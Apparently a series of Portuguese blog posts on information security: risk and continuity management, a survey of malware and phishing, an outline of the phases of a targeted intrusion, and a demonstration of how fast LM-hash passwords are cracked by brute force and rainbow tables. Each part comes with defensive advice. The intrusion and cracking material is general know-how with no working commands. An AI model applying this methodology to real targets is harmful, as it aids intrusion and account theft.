Alguns riscos não podem ser eliminados, mesmo que o impacto seja grande, por demandarem ações inviáveis seja sob o ponto de vista econômico ou prático. Um terremoto pode destruir o prédio onde se encontram as instalações da empresa. O impacto pode ser fulminante, mas considerando um país como o Brasil, onde não existem ocorrências de terremotos, o risco passa a ser insignificante, não justificando a construção de um prédio a prova de terremotos. Já se sua empresa está situada sobre a Falha San Andreas, na Califórnia (EUA)…

Nesses casos, a gerência de riscos deve optar entre assumir ou transferir o risco. Um seguro contra incêndios é uma forma de transferência de risco: “Eu sei que o risco existe, mas eu transfiro responsabilidade para a seguradora”.

Política de Segurança da Informação

Para garantir uma gestão de segurança eficaz, é necessário que se estabeleçam padrões operacionais e de condutas baseadas nas melhores práticas. O documento que define esses padrões dentro da empresa é a Política de Segurança, abordando os seguintes aspectos:

• Diretrizes: possui caráter estratégico, definindo as políticas e por isso são estabelecidas em conjunto com a alta direção. Descreve “o que dever ser feito”;
• Normas: de caráter tático, definem as regras ou normas a serem adotadas, de acordo com as diretrizes estabelecidas;
• Procedimentos: com caráter operacional, descrevem “como” as normas serão implementadas.

A Política de Segurança deve ser um documento de fácil compreensão, para que seja de conhecimento de todos os funcionários, colaboradores e parceiros comerciais para o uso seguro de todos os ativos da empresa, incluindo-se a informação.

Como a Política de Segurança tem caráter normativo dentro da empresa, é necessário que haja um registro escrito e assinado por cada usuário ou funcionário, quanto ao seu conhecimento, inclusive para respaldo da empresa em possíveis questões trabalhistas.

Classificação da Informação

É impraticável, senão impossível, proteger todos os aspectos da informação. Por isso é necessário que as informações seja classificadas de acordo com o nível de criticidade para que sejam dispensados tratamentos distintos para cada situação.

A classificação deve tratar a informação durante todo seu ciclo de vida, estabelecendo critérios para sua criação, manuseio, transporte, armazenamento e descarte.

Diferentes critérios podem ser utilizados para classificar a informação. Uma forma simples pode constar de três categorias:

• Público: acessível a qualquer pessoa dentro e fora da organização, dispensando qualquer tratamento;
• Restrito: somente para circulação interna à empresa e seus funcionários;
• Confidencial: de acesso restrito somente a determinados grupos dentro da organização.

Como esses critérios são estabelecidos na Política de Segurança, dependendo da necessidade, outros níveis podem ser adotados, tais como Institucionais, Secretos ou Super-Secretos (quem ainda não viu o termo Top Secret nos filmes?).

O aspecto que considero importante na Classificação da Informação, é no que diz respeito ao manuseio e descarte da informação. De nada adianta investir milhares de dólares em firewalls, IDSs, IPSs, switches gerenciáveis layer 3, redundância, etc. se a secretária do diretor entrega os planos estratégicos da empresa para o office-boy tirar fotocópias do documento na copiadora da sala no final do corredor…

Gestão de Continuidade de Negócios

Ninguém espera que aconteça, mas todas as empresas estão sujeitas à catástrofes. Em fevereiro de 2005, um incêndio transformou em cinzas, o edifício Windsor, um dos arranha-céus localizado em pleno coração financeiro de Madri (Espanha) e junto com ele, a sede da renomada empresa de auditoria, Deloitte. A empresa, que contava com cerca de 1200 funcionários na Torre Windsor, já estava operando normalmente algumas horas após o incêndio, um centro de backup distante da torre incendiada.

Um relatório da IBM mostra que os incêndios são a principal causa de interrupção das atividades das empresas, respondendo por 17,5% do total de paradas. Em segundo lugar vem o terrorismo
e as sabotagens, nas quais se incluem os vírus de computador, com 17,5% de incidência cada um; depois, causas atmosféricas (14%), terremotos (10,5%), quedas de energia (9,5%), defeitos de software (8,8%), inundações (7%) e defeitos de hardware (5,3%).

É muito fácil tomar decisões erradas em momentos de crise. Para evitar isso, um Plano de Continuidade de Negócios (PCN), deve ser elaborado (e testado) antecipadamente à esses momentos, prevendo locais alternativos para o trabalho, quantitativo mínimo de mão-de-obra, setores da empresa indispensáveis, procedimentos para restauração do ambiente computacional e de infra-estrutura de comunicação entre outros. Esse plano, uma vez testado, deve ser seguido à risca durante a crise, evitando-se improvisações que pode custar mais caro ainda. É importante, também, que esse plano seja revisto e testado periodicamente, adaptando-se às mudanças naturais que ocorrem em qualquer organização.

Segurança Física e Operacional

O que é que segurança física tem a ver com segurança da informação? Tudo!!! Uma janela mal trancada, a ausência de sistemas de alarme e câmeras de vigilância podem contribuir para que equipamentos ou componentes deles podem ser furtados. Equipamentos não autorizados podem ser plugados à rede com a finalidade de espionagem. Um indivíduo contratado pela concorrência, pode entrar no prédio com um notebook, conecta-lo à rede e lançar um ataque de negação de serviço, justamente no momento de um pregão eletrônico. Uma sala de servidores sem controle de acesso físico, pode permitir que um atacante reinicie um servidor e então roubar o arquivo de senhas, resetar senhas de usuários administradores ou até elevar o privilégio de usuários comuns.

Um incêndio pode comprometer a disponibilidade da informação, portanto, os responsáveis pela segurança da informação tem que estar atentos para verificar se os sistemas de proteção contra incêndio estão operacionais; se os extintores de incêndio estão com as revisões em dia; se as mangueiras de combate a incêndio estão em boas condições e desobstruídas; se as portas corta-fogo estão funcionando corretamente. A preservação das vidas humanas é prioritário em caso de catástrofes, mas além do aspecto humano, existe o fato que a perda de funcionários pode comprometer a continuidade dos negócios, portanto, a eficácia de um plano de evacuação, apesar de não parecer, também faz parte da atribuição da equipe de Segurança da Informação.

Interrupções no fornecimento de energia elétrica, podem comprometer a disponibilidade, portanto quadros de distribuição de energia elétrica devem ser de acesso restrito e manuseado somente por pessoas autorizadas e qualificadas. A mesma preocupação deve ser dispensada à infraestrutura de telefonia e cabeamento lógico.

Como se pode ver, existem “n” pontos de vulnerabilidade, cujos riscos devem ser mitigados através de procedimentos relativos à segurança física e que podem afetar a segurança da informação.

Além do perímetro

Todos os aspectos abordados acima, fazem parte das disciplinas relativas à parte gerencial da Segurança da Informação, que eu citei somente para que você possa ter idéia da abrangência dessa especialidade da TI. Existem outros aspectos que não citei para não prologar demais o artigo.

Também não comentei nada sobre o lado técnico da Segurança da Informação, mais ligada aos bits, bytes, protocolos, softwares, etc que demandaria outras tantas páginas de texto.

O importante é que a partir de agora, quando você ouvir falar em Segurança da Informação, já vai perceber que está se falando de algo muito mais complexo e abrangente do que simplesmente defesa do perímetro contra ataques de crackers.

——

Adicione um comentário.

Já que não dá para eliminar… Aprenda a conviver…

A internet já conquistou seu lugar na sociedade moderna, da mesma forma que o telefone e a televisão. O seu uso já está incorporado nos hábitos de grande parte da população urbana e muitos não conseguem mais viver sem ela. Eu, por exemplo, posso até viver sem telefone e até sem televisão, mas sem internet?? Jamais!!

Contudo, o uso popular da internet trouxe junto uma série de perigos, assim como a criminalidade nas grandes cidades, entre as quais, diversas formas de pragas virtuais. Como é impossível “extermina-las” da internet, temos que conhece-las para saber como evita-las.

De modo geral, as diferentes formas de programas maléficos, são denominadas de malware, que é um neologismo criado a partir do termo malicious software (programas maliciosos).

Vírus

Os vírus surgiram com os primeiros computadores pessoais ou microcomputadores, mas sua disseminação antes da internet, se dava basicamente pela troca de arquivos em meio magnético (disquetes) e por isso de forma muito mais lenta do que nos dias atuais.

Eles são assim chamados porque sua forma de propagação é semelhante à sua contraparte biológica. Um programa “infectado” contamina outros programas “sadios” ao ser executado, que por sua vez passa a contaminar outros programas.

Em resumo, um vírus de computador, é um programa se agrega a qualquer programa normal ao ser executado. A partir daí, toda vez que esse programa for executado, o código do vírus também é , passando a se agregar a outros programas. Mas a característica básica é que um vírus não tem “vida” autônoma. Ele só é executado se o programa infectado for executado. Por isso eles podem ser detectados pelos programas anti-vírus antes de causarem qualquer dano.

Uma vez instalado no sistema, o vírus pode ter as mais diversas funções, como apagar arquivos, espionar o usuário, permitir acesso remoto de um atacante, tornar o computador um “zumbi” para lançar ataques em massa contra outros sistemas, etc.

Worms

Vermes: Com funções (maléficas) semelhantes aos vírus, eles se diferem por possuir vida “autônoma”, ou seja, eles não necessitam que um programa seja executado para ele também o seja.

Para sua propagação, os worms exploram vulnerabilidades (falhas) de sistemas operacionais ou simplesmente usam os compartilhamentos de rede para passar de um computador para outro. Uma vez que ele consiga se infiltrar num computador, ele passa a varrer a rede a procura de outros computadores para onde ele possa se copiar e assim continuar a propagação.

Por isso sua propagação pode ser muito rápida e crescendo de forma exponencial, num efeito cascata, tem potencial para colapsar toda internet em poucas horas. Já tivemos exemplo disso com a disseminação do Code Red anos atrás (leia mais).

Trojan

Cavalo de Tróia (ou Trojan Horse): De forma análoga ao cavalo de madeira usado pelos gregos para invadir Tróia, os trojans são programas que se instalam no computador do usuário fazendo-se passar por um programa legítimo. São muito utilizados em ataques de phishing (veja mais detalhes abaixo) onde são passados através de email. Outra forma muito utilizada para sua propagação, são as redes de compartilhamento (kazaa, emule, etc), na forma de softwares piratas, cracks (programas que burlam os sistemas de licenciamento dos softwares) e supostos vídeos e fotos pornôs.

Alguns sites maliciosos também pode instalar trojans na forma de controles Active-x, que são programas executados no browser (Internet Explorer), fazendo-se passar por visualizadores de vídeo ou sistemas de autenticação. Nesses casos o navegador pede permissão para o usuário proceder a instalação, o que muitas vezes ocorre por ignorância dele (o que não é mais o seu caso, né?).

Phishing

Corruptela da palavra “fishing” ou “pescaria”: técnica de Engenharia Social que visa persuadir o usuário a executar um programa malicioso ou acessar um site falsificado com objetivo de obter números de contas bancárias, cartão de crédito e senhas, visando fraude financeira.

Normalmente os atacantes enviam e-mails de forma indiscriminada que invariavelmente acabam enganando um ou outro usuário incauto. Acabam obtendo resultados expressivos pela larga escala em que os e-mails enviados. O conteúdo desses e-mails são os mais variados possíveis, indo de pendências no Serasa/SPC/Receita Federal, passando por prêmios em automóveis e até supostas fotos comprometedoras do namorado(a) ou personalidades famosas (leia mais).

Outras formas de propagação, são as redes sociais (Orkut, Facebook, etc) e os comunicadores de mensagens instantâneas (MSN, Gtalk, etc), em formas de supostos cartões virtuais, fotos ou vídeos. Nesses casos as mensagens partem de computadores já comprometidos, fazendo-se passar pelo seu usuário, o que acaba enganando usuários desatentos, mesmo que experientes (eu já caí numa dessas).

Keyloggers

Registradores de teclado: são programas espiões, instalados usando quaisquer dos artifícios acima, e que passam a registrar toques de teclado e até posição de cliques de mouse, com a finalidade de obter dados bancários e senhas. Geralmente são os programas instalados nos ataques de phishing. Tudo que for registrado pelo programa é enviado ao atacante em qualquer ponto da internet.

Spyware

Software espião: o sentido original do termo define programas com a finalidade de coletar informações a respeito de seus hábitos de navegação, consumo e pontos de interesse para alimentar uma base de dados a fim de gerar propagandas dirigidas, geralmente spams (e-mails não solicitados). Atualmente o termo pode designar qualquer forma de programa espião, incluindo-se os keyloggers.

Adware

Software de propaganda: apesar de não provocarem maiores danos, são muito inconvenientes e geralmente difíceis de serem removidos, ao ponto de requerer a formatação do disco rígido e nova instalação do sistema operacional.

Esses programas geralmente são instalados ao acessar sites de pornografia ou cracks. Uma vez instalados, modificam a página inicial do navegador (e não adianta você tentar repor a sua página inicial que o programa altera novamente) geralmente direcionando para algum site pornô. Além disso costuma ficar abrindo, automaticamente, novas instâncias do navegador ou janelas de pop-up, direcionando para outros sites. O pior de tudo é que os sites para onde você é direcionando acabam instalando outros adwares, que provocam a abertura de mais e mais janelas.

Outras pragas

Dentre as pragas que não trazem maiores riscos, mas são bastante inconvenientes estão os spams e os hoaxes.

Spams são e-mails de propaganda não solicitada que costumam entulhar as caixas postais se não houver um filtro anti-spam eficaz junto ao servidor de e-mail. Eu mesmo já tive grandes dores de cabeça por encontrar o servidor de e-mail parado após um final de semana, por esgotamento do espaço em disco de tanto spam que chegava nele.

Hoaxes são mensagens de e-mail, muitas vezes de conteúdo alarmante, mas sem fundamento que só servem para entulhar nossas caixas postais e os links de internet. São e-mails do tipo “a empresa x vai pagar para você por cada e-mail repassado”, “fulano acordou numa banheira cheia de gelo sem um dos rins”, “dia tal, o planeta marte ficar do tamanho da lua”, e por aí vai. O engraçado é como essas mensagens circulam de forma recorrente. Esse sobre o planeta marte eu já havia recebido há mais de 4 anos atrás e recebi novamente esse ano…

Recomendações

Recentemente li um uma postagem num fórum sobre segurança, um sujeito dizendo que não usava programa anti-vírus para não consumir recurso de processamento. Ao invés disso ele preferia ficar examinando os processos que estavam sendo executados na máquina. Esse tipo de raciocínio é totalmente equivocado. Atualmente, não podemos abrir mão de um bom programa de anti-vírus porque eles impedem a ação do vírus (e outras espécies de malware) antes que eles se instalem na máquina. Uma vez que o malware se instale na máquina, geralmente não se consegue removê-los sem que isso provoque “seqüelas” no sistema operacional, exigindo sua reinstalação.

Também não adianta te anti-vírus instalado na máquina se o seu banco de dados não está atualizado. Dezenas de novos vírus ou variantes são criados todos os dias. Se o banco de dados não está atualizado, o programa não tem como detectar esses novos vírus, porque ele contem as chamadas assinaturas dos vírus (padrões que servem para o anti-vírus detectar que determinado código é de um determinado vírus).

Existem várias opções de anti-vírus gratuitos na internet: AVG, Avast, Avira, são alguns deles. Se você não tem nenhum, faça uma pesquisa na internet e instale qualquer um deles. Qualquer anti-vírus é melhor que não ter nenhum.

Mantenha seu sistema atualizado com as últimas correções. No Windows, o Windows Update tem essa função. Uma pesquisa recente estimou em 450 mil PCs zumbis na internet. Geralmente, são máquinas sem as devidas aplicações de correções, cujas vulnerabilidades são exploradas para sua invasão e instalação de programas que os tornam zumbis (leia mais).

Evite acessar sites de pornografia, softwares piratas e cracks. Uma pesquisa recente do Google, chegou à estimativa de que um em cada dez sites da internet podem instalar códigos maliciosos no computador do internauta sem seu conhecimento. A grande maioria desses sites é de pornografia ou pirataria (leia mais).

Cuidado com o uso do seu pendrive. Devido a facilidade de uso desse dispositivo, os criadores de vírus estão utilizando-os como vetor de propagação (leia mais).

Por fim, tenha muito cuidado ao clicar em links que você recebe por e-mail, redes sociais ou mensagens instantâneas.

——

Adicione um comentário

Enquanto isso, no outro lado de Gothan…

No silêncio da madrugada, num quarto sombrio, à penumbra de uma luminária sobre uma mesa cheia de livros e papéis, um sujeito com cara de Nerd tecla freneticamente no de seu computador. Eles está tentando invadir um sistema. Após alguns segundos, dispara um programa que exibe em posições fixas da tela, seqüências de caracteres aleatórios de tamanhos garrafais. Lentamente, um caracter após o outro, começam a parar revelando a senha correta do sistema. Invariavelmente uma frase pisca algumas vezes na tela: “Access Granted” e abre-se uma tela do sistema de uma agência de segurança governamental….

Isso lhe soa familiar? Parece coisa de filme… E só pode ser coisa de filme, mesmo! No mundo real, as invasões não ocorrem dessa forma. Isso não passa de pirotecnia hollyoodiana. Também não vamos considerar como invasões, as decorrentes de pragas como worms, pichações em páginas web decorrentes de vulnerabilidades descobertas por ferramentas automatizadas que varrem a internet indiscriminadamente disparadas por Script Kiddies, muito menos os ataques de phishing, feitos por pessoas as quais a mídia insistem em chamar de hacker.

Worms, são programas semelhantes aos vírus de computador, que se propagam pelas redes explorando vulnerabilidades e compartilhamentos de rede. As ferramentas automatizadas utilizadas por Script Kiddies são encontradas prontas pela net, eles as usam sem saber o que realmente elas fazem. Phishers fazem parte de uma categoria que nem considero como parte do mundo de TI (Tecnologia da Informação), já que muitos usam programas prontos comercializados no submundo da internet. Para mim, não passam de simples criminosos.

As invasões “reais” são realizadas por pessoas com elevado nível de conhecimento técnico, com focos específicos em determinadas instalações ou empresas. Eles podem ser movidos pelo desafio de violar sistemas de seguranças, por mero prazer pessoal ou pela busca de prestígio nas comunidades crackers. Pode ser que eles sejam movidos por questões financeiras, na intensão de cometer fraudes ou até mesmo contratados por empresas concorrentes para espionagem ou sabotagem.

Existe também uma categoria de profissionais que são contratados pelas empresas para testar seus próprios sistemas de segurança, desenvolvendo a atividade se chama de PenTest (Penetration Test ou Teste de Penetração).

Esse tipo de invasão é uma atividade coordenada e cuidadosamente planejada, que invariavelmente passa por diversas etapas, conforme vamos ver a seguir.

1. Coleta de informações

Antes de iniciar qualquer tentativa de invasão, devemos coletar o máximo de informações a respeito da empresa atacada. Uma pesquisa no Google pode ser um bom começo para saber o que existe de informação disponível na internet, a respeito de:

• Atividades da empresa;

• Composição acionária;

• Nomes de sócios, diretores, gerentes de TI, administradores da rede;

• Filiais e empresas coligadas;

• Endereços de homepages e e-mails;

Ainda nessa fase, considerando que a empresa possua um site na internet, podemos coletar as informações sobre endereços de servidores DNS (Domain Name Service ou Serviço de Nome de Domínio), nome do responsável técnico (geralmente é o administrador da rede), endereço e cnpj.

Toda e qualquer informação deve ser considerada para que possamos ter uma visão global e um bom nível de entendimento sobre a empresa. Nomes de sócios, diretores, funcionários e parceiros comerciais podem ser utilizados para ataques de Engenharia Social. A existência de filiais e coligadas pode significar a existência de conexões VPN (Virtual Private Network ou Rede Privada Virtual), que a princípio é uma forma segura de interconectar redes pela internet. Endereços web servem para descobrir os endereços IP por onde a rede corporativa geralmente se conecta na internet.

2. Mapeamento da rede

O objetivo dessa fase é tentar descobrir a topologia da rede: quantos computadores existem e como estão interligados. Para isso, podemos iniciar com uma pesquisa nos servidores de DNS da empresa.

Um servidor DNS é responsável pela mapeamento dos nomes de domínio (ex: servidor.empresa.com) para endereços IP (ex: 200.100.200.50). Ele é naturalmente acessível pela internet para determinados tipos de consultas, entretanto, existe um recurso, chamado de Transferência de Zona, que serve para sincronização de registros entre servidores primários e secundários. Alguns administradores de rede permitem que esse tipo de consulta seja feita de qualquer lugar da internet, por descuido ou desconhecimento, e simplesmente fornece o “mapa da mina” para um atacante, porque esse tipo de consulta permite que se obtenha todo os nomes e endereços de todos os servidores da rede. Se esse servidor DNS também for responsável pela resolução de nomes da rede interna, pode ser que o atacante obtenha não só os endereços dos computadores acessíveis pela internet, mas simplesmente de TODOS os computadores da rede interna da empresa.

Uma outra possibilidade para descobrir os computadores que existem no domínio da empresa, é através de consultas de DNS “reverso”, quando informamos o endereço IP e o servidor retorna o nome da máquina que responde por aquele endereço. Sabendo o endereço de um servidor, é possível inferir a faixa de endereços possivelmente destinados à empresa e limitar a pesquisa reversa nessa faixa.

Existe inclusive uma técnica sofisticada de mapeamento, chamada de firewalking, que permite “enxergar” quais são as máquinas que estão por trás do firewall. Seria mais ou menos como se pudéssemos ver através das paredes.

3. Enumeração de serviços

Uma feita já foram descobertas as máquinas existentes na rede, procuramos descobrir quais os serviços que estão sendo executados em cada uma delas. Um serviço não é nada mais do que um programa que fica aguardando conexões numa determinada “porta”. Por exemplo, todas as conexões de páginas web são feitas para a porta de número 80. Quem responde às solicitações de conexão nessa porta é um software servidor web como por exemplo, Apache, IIS (Internet Information Service) da Microsoft ou qualquer outro software com a mesma finalidade.

As portas de numeração 1 à 1024 (de um total de 65.535) são padronizadas de acordo com o tipo de serviço. Assim, se encontramos a porta 22 aberta, podemos ter quase certeza que existe um serviço SSH (terminal remoto), assim como a porta 25 implicaria num serviço de e-mail. Só não podemos ter certeza sobre o serviço que está “escutando” uma determinada porta porque essas numerações são padronizadas, mas não obrigatórias. Nada impede que o administrador disponibilize um serviço SSH na porta 25, por exemplo.

Nessa etapa também procuramos identificar as versões dos sistemas operacionais e de cada software servidor, com uso de ferramentas adequadas. Essa informação será útil na próxima etapa.

4. Busca por vulnerabilidades

Uma vulnerabilidade de um software é decorrente de um projeto deficiente ou erro de programação. Quando uma vulnerabilidade é descoberta por incontáveis pesquisadores (os verdadeiros Hackers) ao redor do mundo, o fabricante do software é notificado e a vulnerabilidade é divulgada em sites especializados para que todos tomem conhecimento da sua existência e tomem as providências necessárias para eliminar esse risco. Isso geralmente é atingido com a aplicação de uma Correção ou Patch (traduzindo literalmente: remendo), disponibilizado pelo fabricante do software.

Se o administrador da rede não aplicou as devidas correções num determinado software, pode ser que ele possa ser explorado para a invasão. Para isso, basta um pesquisa na internet para descobrir se aquela versão de software que está sendo usada, possui alguma vulnerabilidade e como ela é explorável.

Algumas ferramentas já automatizam todo o processo de identificação dos softwares, suas versões, assim como a vulnerabilidades existentes para aquelas versões específicas, simplificando o trabalho do atacante.

5. Exploração das vulnerabilidades

Essa é a etapa onde efetivamente ocorre a invasão. Dependendo do tipo de vulnerabilidade encontrada, a invasão será mais ou menos efetiva. Algumas vulnerabilidades permitem apenas a interrupção do serviço, ao qual damos o nome de ataque DOS (Denial of Service ou Negação de Serviço).

As vulnerabilidades mais perigosas são as que permitem a execução de programas e comandos no computador remoto. O Buffer Overflow (estouro de memória) é um exemplo de vulnerabilidade que pode permitir que o atacante obtenha acesso à uma tela de terminal remoto, podendo executar os comandos que desejar, como se estivesse sentado diante do computador atacado e geralmente com privilégios de administrador.

Outro exemplo de ataque perigoso é o do tipo SQL Injection, feito em aplicações web mal feitas, permite desde a consulta direta à um banco de dados (onde o atacante pode obter informações sigilosas como números de cartões de crédito) à execução comando do sistema operacional.

Existem inúmeros tipos de vulnerabilidades que me permitiriam discorrer em páginas e mais páginas, mas como não é o objetivo transforma-lo em um especialista em segurança, vamos nos restringir a esses exemplos.

Muitos desses ataques podem ser feitos com uso de programas ou scripts prontos, chamados de sploits.

6. Implantação de Backdoors e Rootkits

Uma vez que o invasor tenha obtido sucesso na sua investida, é comum que ele implante programas que facilitem o seu retorno. São os chamados Backdoors, ou literalmente “porta dos fundos”. Além disso ele pode implantar os chamados Rootkits, que são programas que se agregam ao núcleo do sistema operacional, dificultando a sua localização.

7. Eliminação de Vestígios

Toda invasão deixa rastros no computador atacado, seja nos logs (históricos) do sistema seja em forma de arquivos temporários. Para dificultar a identificação da sua presença, o bom atacante procura eliminar esses vestígios, requerendo uma intervenção muito mais minuciosa na investigação do incidente e muitas vezes impossibilitando rastrear sua origem.

Formas de prevenção

Se você é um usuário comum não há muito o que fazer, mas se você é um administrador de redes, é sua responsabilidade tomar as medidas preventivas necessárias para minimizar esses riscos.

• Uso de firewall, IDS e IPS: o firewall é um elemento indispensável na sua rede, para controlar e impedir os acessos indesejáveis. Hoje é simplesmente inaceitável que se tenha uma rede conectada na internet sem um firewall. O uso de IDS (Intrusion Detection System ou Sistema de Detecção de Intrusão) e um IPS (Intrusion Prevention System ou Sistema de Prevenção de Intrusão), são elementos desejáveis para uma defesa efetiva.
• Serviços desnecessários: todos os serviços que não estiverem sendo efetivamente usados, devem ser desabilitados. Além de serem itens adicionais para atualizações de segurança, são pontos adicionais em potencial para serem explorados.
• Atualização e Configuração: é indispensável que todos os serviços disponíveis para internet estejam com as últimas atualizações de segurança aplicadas e, principalmente, corretamente configurados. Falhas de configurações são grandes causas de incidentes de segurança.
• Monitoração constante: a monitoração das atividades da rede devem fazer parte da rotina diária de um administrador de redes. Só assim você poderá perceber anomalias no seu funcionamento. Deve ser incluída nessa rotina, a monitoração dos logs, também para detectar registros de ocorrências anormais. O uso de ferramentas que detectem modificações nos arquivos do sistema também é uma medida desejável. Uma ferramenta gratuita que pode ser utilizada para esse fim, é o tripwire.

A melhor forma de defesa, entretanto, é o conhecimento. Fique sempre atualizado quanto as novas formas de ataque e vulnerabilidades descobertas para poder agir de forma proativa, antecipando-se aos movimentos dos invasores.

——

Adicione um comentário.

(Parte 1)

Como funciona o “password cracker”

Os programas quebradores de senhas “clássicos” costumam seguir determinados passos para obter sucesso na quebra de uma senha.

• A primeira coisa que eles fazem é tentar senhas a partir de variações do próprio nome de usuário. Ex: usuário Administrator, senha Administrator; Administrator/admin; root/root
• O segundo passo é o ataque de dicionário, que consiste em utilizar uma lista de palavras geralmente criadas a partir de palavras de um determinado idioma. Existem listas com mais de 150 mil palavras disponíveis na internet para cada idioma desejado.
• O terceiro passo é o ataque de força bruta propriamente dito, onde o programa gera todas as variações possíveis dentro de um universo de caracteres previamente estabelecido. Quanto maior esse conjunto, mais demorado é o processamento, mas aumentam as possibilidades de sucesso.
• Em alguns programas, como o LM hash é dividido em duas partes, a quebra de uma parte já é utilizada para restringir as tentativas em um dicionário para quebrar a segunda parte.
• Uma vez quebrada a senha LM hash, o programa parte para variações de minúsculas e maiúsculas para obter a senha NT hash.

A ilustração abaixo mostra um programa de quebra de senha onde criei 6 usuários, com diferentes tipos de senhas, para que você possa ter idéia da velocidade com que esses programas funcionam.

Para esse teste, o conjunto de caracteres utilizado compreendia letras (maiúsculas e minúsculas), números e símbolos (!@#$%^&*()-_+=~`[]{}|\:;”‘<>,.?/) – 65 trilhões de combinações segundo meus cálculos. O dicionário de palavras constava apenas um conjunto de 29 mil palavras da língua inglesa e o computador utilizado foi um Celeron de 2.4 Ghz com 1Gb de memória (um computador modesto para os dias atuais).

Os usuários e senhas criados foram:

• User1, senha “User1”: quebrado em menos de um segundo por ser igual ao nome do usuário.
• User2, senha “computational”: quebrado em menos de um segundo por ser uma palavra de dicionário.
• User3, senha “Senha”: quebrado em 45 segundos por força bruta por ser uma palavra pequena.
• User4, senha “MinhaSenha”: por ser uma senha de 10 caracteres, o método de força bruta já levou 4:40 horas para quebrá-la.
• User5, senha “U$er5”: apesar de conter letras maiúsculas, minúsculas, números e símbolos, foi quebrado em 1 minuto e 24 segundos por ser uma senha curta.
• Admin, senha “M!nh@53nh@”: por ser uma senha de 10 caracteres, usando maiúsculas, minúsculas, números e símbolos, ela só foi quebrada parcialmente (3 últimos caracteres) ao longo de 6 horas de processamento, que foi a duração do meu teste.

Observe no lado direito da imagem, no quadro “BRUTE FORCE”, alguns dados interessantes:

• time elapsed: 0d 6h 0m 2s – tempo de processamento decorrido (6 horas, 0 minutos).
• time left: 1d 14h 19m 38s – tempo estimado para conclusão do processamento (1 dia 14 horas e 19 minutos).
• % done: 13,5367% – percentual concluído.
• keyrate: 4995560 k/s – número de senhas testadas por segundo.

O que se pode concluir desses dados: após 6 horas de processamento, apenas uma senha não havia sido quebrada, entretanto, somente 13,5% do total de combinações havia sido explorado. Em menos de 2 dias, com uma máquina modesta, essa senha seria quebrada com absoluta certeza, já que todos os caracteres utilizados estavam contidos no universo testado, à uma velocidade de cerca de 5 milhões de senhas por segundo!!!

Claro que isso só é possível porque o limite máximo do LM hash é de 7 caracteres “case insensitive”. Aumentando tamanho da senha (sem LM hash) e o número de caracteres do conjunto, poderíamos levar meses e até anos de processamento. É só fazer as contas….

Tabelas pré-computadas

Os métodos mais modernos de quebra de senha utilizam tabelas de hash pré-computadas, trocando poder de processamento por uso de memória. Ao invés de calcular o hash em tempo real, todo esse processamento é feito antecipadamente e armazenando em tabelas. O problema desse método, é que tabelas de hash a partir de um conjunto completo de caracteres podem facilmente chegar aos 120 Gb de armazenamento ou até mais dependendo dos comprimentos de senha pre-computados.

A imagem a seguir foi feita a partir de um programa que utiliza tabelas pre-computadas, abrangendo somente letras (maiúsculas e minúsculas) e números. Um conjunto pequeno de caracteres mas que já gerou tabelas cujo tamanho total aproximado é de 700 Mb.

Com esse programa, as senhas do “User5” e “Admin” não foram quebradas porque utilizavam símbolos que não constavam do conjunto gerador das tabelas de hash. O detalhe importante a ser notado, é que o “User4”, cuja senha é “MinhaSenha”, foi quebrado em menos de 3 minutos (veja o Time elapsed no canto inferior direito) contra quase 5 horas consumidas pelo método tradicional. Se eu tivesse 120 Gb de tabelas de hash, ao invés de 2 dias de processamento, todas as senhas seriam quebradas em questão de minutos!

Faça seu próprio teste

Para que você tenha idéia da velocidade com que uma senha é quebrada usando tabelas pré-computadas, acesse o site http://www.objectif-securite.ch/en/products.php. No final da página existe um teste para quebra de senha online conforme pode ser visto na figura seguinte.

Essa demonstração só abrange letras e números. No campo “password”, digite a senha que você deseja testar e clique no botão “submit password”. Logo abaixo, vai aparecer o hash da senha que você digitou.

Selecione o hash criado, copie (ctrl+C), cole (ctrl+V) no campo acima onde está escrito “hash” e clique no botão “submit hash”.

Uma vez clicado no botão “submit hash”, não clique em mais nada e nem recarregue ou atualize a página. De qualquer forma você não vai precisar aguardar muito para obter a senha quebrada a partir do hash.

Como melhorar a segurança das senhas

Existem algumas recomendações para melhorar a segurança das suas senhas. A primeira já deve ser óbvia para você a essa altura do campeonato.

Crie senhas longas: quanto maior for a senha e quanto mais diversificados forem os caracteres utilizados, mais difícil se torna a quebra.

Troque de senha periodicamente: por mais longa e diversificada que seja a senha, ela pode ser quebrada. É só uma questão de tempo e poder computacional.

Crie seu próprio “alfabeto”: evite usar somente letras. Além de evitar o risco de ataques por dicionário, você diversifica o conjunto de caracteres. Para facilitar a memorização você pode substituir a letra A por 4, E por 3, I por !, O por 0 (zero), C por (, T por 7, S por $, L por 1 (um) e por aí vai. Assim, ao invés de escrever MinhaSenha, escreva M!nh4$3nh4.

Use senhas diferentes: alguns sistemas ou serviços são mais seguros que outros. Se você usa a mesma senha em diversos lugares diferentes, pode ser que ela seja quebrada em algum lugar e utilizada em outro. Uma forma de fazer isso é utilizar um sufixo ou prefixo que identifique o serviço. Por exemplo: M!nh4$3nh4/Hm1 para hotmail, M!nh4$3nh4/Gm1 para Gmail. Se você achar isso muito complicado, procure pelo menos agrupar as senhas por tipo de serviço: uma só para banco, outra para e-mails e sites de relacionamento, outra para usuário da rede, outra para usuário administrador, outra para sites diversos.

Use gerenciadores de senha: existem vários programas disponíveis na internet com essa finalidade, permitindo que você tenha uma senha diferente para cada lugar. O importante é que ela armazene as senhas com uma criptografia forte e que você use uma senha forte. É importante também que você tenha cópias em lugares distintos para evitar a sua perda. Você pode usar volumes criptografados e sincronizados, conforme já publiquei em posts anteriores.

Mantenha seu servidor trancado: essa recomendação é para administradores de rede. Se o servidor não estiver em um local seguro contra acessos físicos e permitir boot a partir de um CD, é possível extrair o arquivo de senhas do sistema para serem quebradas em outro computador ou simplesmente, pode-se apagar a senha de qualquer conta ou ainda elevar o privilégio de um usuário comum, tornando-o administrador do sistema.

Desabilite o LM Hash: também para administradores de rede. O LM hash pode ser desabilitado mas pode gerar alguns problemas de conectividade. Veja maiores detalhes em: http://support.microsoft.com/kb/299656

A recomendação final é a que eu sempre cito para quaisquer medidas de segurança: Bom senso. Medidas de segurança extremas implicam em maior dificuldade no uso e pode representar uma perda de tempo e energia para proteger algo que não requeira proteção elevada.

—–

Adicione um comentário

Sua senha, sua vida

